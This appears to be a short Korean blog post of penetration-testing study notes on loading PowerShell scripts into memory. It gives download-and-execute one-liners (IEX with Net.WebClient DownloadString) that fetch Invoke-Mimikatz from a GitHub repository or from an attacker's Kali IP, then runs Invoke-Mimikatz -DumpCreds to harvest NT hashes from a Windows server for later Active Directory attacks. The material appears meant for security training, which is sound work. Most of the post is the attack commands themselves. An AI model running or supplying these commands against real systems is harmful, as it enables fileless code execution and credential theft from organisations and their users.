- 파워쉘 스크립트 메모리상에 로드 (Load/불러오기)
- IEX (new-object net.webclient).downloadstring('<스크립트- URL>')
- 예) IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimitakz.ps1')
- 메모리 상에서 스크립트 내 함수 실행
- <함수 이름>
- 예) Invoke-Mimikatz -DumpCreds
- 추후 후속 공격에서 많이 사용
powershell은 .NET을 사용할 수가 있는데, .NET은 여러 가지 기능을 가지고 있다.
이 중에서 http client라는 기능을 사용할 것임.
IEX(New-Object Net.Webclient).DownloadString('http://<칼리리눅스 openvpn ip/Invoke-Mimitakz.ps1')
Get-Help Invoke-Mimikatz
를 입력하면 뭔가가 출력이 나온다.
그러나 새로운 powershell을 열어서 invoke-mimikatz를 입력하면 안 나옴.
왜냐하면 IEX를 이용하여 파워쉘 프로세스의 메모리 상에서 load를 시킨 상태이기 때문.
Invoke-Mimikatz -DumpCreds
이 명령어 실행 시 윈도우 서버에 존재하는 사용자의 NT 해시값을 얻어낼 수 있음.
이건 나중에 AD에서 굉장히 유용하게 사용됨.'해킹 > 호스트 기반 모의해킹' 카테고리의 다른 글
| [ 호스트 기반 모의해킹 ] 리버스 쉘 제작 (0) | 2023.11.03 |
|---|---|
| [ 호스트 기반 모의해킹 ] 해시크래킹 (0) | 2023.11.02 |
| [ 호스트 기반 모의해킹 ] 계정 정보 기반 공격 (0) | 2023.10.31 |
| [ 호스트 기반 모의해킹 ] 후속 공격 - 리눅스 #2 권한 상승 공격 (0) | 2023.10.20 |
| [ 호스트 기반 모의해킹 ] 리버스 쉘 업그레이드 (0) | 2023.10.18 |